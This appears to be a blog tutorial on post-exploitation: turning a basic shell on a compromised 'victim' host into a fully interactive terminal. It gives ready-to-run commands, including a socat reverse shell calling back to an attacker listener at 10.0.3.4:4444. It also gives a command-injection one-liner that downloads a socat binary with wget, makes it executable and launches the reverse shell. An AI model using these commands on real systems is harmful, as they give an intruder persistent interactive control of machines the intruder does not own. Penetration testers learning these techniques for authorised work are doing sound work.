Upgrading Simple Shells to Fully Interactive TTYs

Hacking 101 Post-Exploitation
by TechnoHerder : 1 Comment

Method 1: Python pty module

One of my go-to commands for a long time after catching a dumb shell was to use Python to spawn a pty. The pty module let’s you spawn a psuedo-terminal that can fool commands like su into thinking they are being executed in a proper terminal. Spawn /bin/bash using Python’s PTY module, and connect the controlling shell with its standard I/O. To upgrade a dumb shell, simply run the following command:

python -c 'import pty; pty.spawn("/bin/bash")'

This will let you run su for example (in addition to giving you a nicer prompt)

Method 2: Shell to Bash 

Upgrade from shell to bash.

SHELL=/bin/bash script -q /dev/null

Method 3: Fully Interactive TTY 

Background the current remote shell (^Z), update the local terminal line settings with stty2 and bring the remote shell back.

stty raw -echo && fg

After bringing the job back the cursor will be pushed to the left. Reinitialize the terminal with reset.

Method 4: Using socat

socat is like netcat on steroids and is a very powerfull networking swiss-army knife. Socat can be used to pass full TTY’s over TCP connections.

If socat is installed on the victim server, you can launch a reverse shell with it. You must catch the connection with socat as well to get the full functions.

The following commands will yield a fully interactive TTY reverse shell:

On Kali (listen):

socat file:`tty`,raw,echo=0 tcp-listen:4444

On Victim (launch):

socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.0.3.4:4444

If socat isn’t installed, you’re not out of luck. There are standalone binaries that can be downloaded from this awesome Github repo:

https://github.com/andrew-d/static-binaries

With a command injection vuln, it’s possible to download the correct architecture socat binary to a writable directoy, chmod it, then execute a reverse shell in one line:

wget -q https://github.com/andrew-d/static-binaries/raw/master/binaries/linux/x86_64/socat -O /tmp/socat; chmod +x /tmp/socat; /tmp/socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.0.3.4:4444

On Kali, you’ll catch a fully interactive TTY session. It supports tab-completion, SIGINT/SIGSTP support, vim, up arrow history, etc. It’s a full terminal. Pretty sweet.

1 thought on “Upgrading Simple Shells to Fully Interactive TTYs

  1. Some really nice and utilitarian information on this site, also I think the style and design has fantastic features.

    Reply

Leave a Reply

Your email address will not be published. Required fields are marked *